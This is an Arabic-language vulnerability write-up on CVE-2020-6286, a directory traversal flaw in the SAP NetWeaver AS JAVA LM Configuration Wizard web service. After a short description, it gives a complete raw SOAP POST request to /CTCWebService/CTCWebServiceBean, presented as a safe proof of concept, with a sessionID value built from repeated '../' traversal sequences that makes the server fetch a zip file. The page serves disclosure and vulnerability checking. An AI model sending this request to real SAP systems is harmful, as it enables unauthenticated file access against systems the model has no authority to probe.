
[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) اجتياز الدليل
[CVE-2020-6286] ثغرة اجتياز الدليل في SAP NetWeaver AS JAVA (معالج تكوين LM)
SAP NetWeaver هي منصة التكنولوجيا المتكاملة من SAP والأساس التقني لجميع تطبيقات SAP منذ SAP Business Suite. SAP NetWeaver هي منصة تطبيقات وتكامل موجهة نحو الخدمات توفر بيئة تطوير وتشغيل لتطبيقات SAP، ويمكن استخدامها أيضًا للتطوير المخصص والتكامل مع التطبيقات والأنظمة الأخرى. التحقق غير الكافي من مسار الإدخال لمعامل معين في خدمة الويب لـ SAP NetWeaver AS JAVA (معالج تكوين LM)، الإصدارات 7.30, 7.31, 7.40, 7.50، يسمح لمهاجم غير مصرح له باستغلال طريقة لتنزيل ملفات zip إلى دليل محدد، مما يؤدي إلى اجتياز المسار.
لإثبات المفهوم الآمن، يمكنك استخدام الطلب التالي. إذا كان ملف zip موجودًا على المضيف البعيد، فسيتم تنزيل ملف 111.zip
POST /CTCWebService/CTCWebServiceBean HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
<soapenv:Header />
<soapenv:Body>
<urn:queryProtocol>
<sessionID>/../../../../../../../../../../../../../../../../../..111</sessionID>
</urn:queryProtocol>
</soapenv:Body>
</soapenv:Envelope>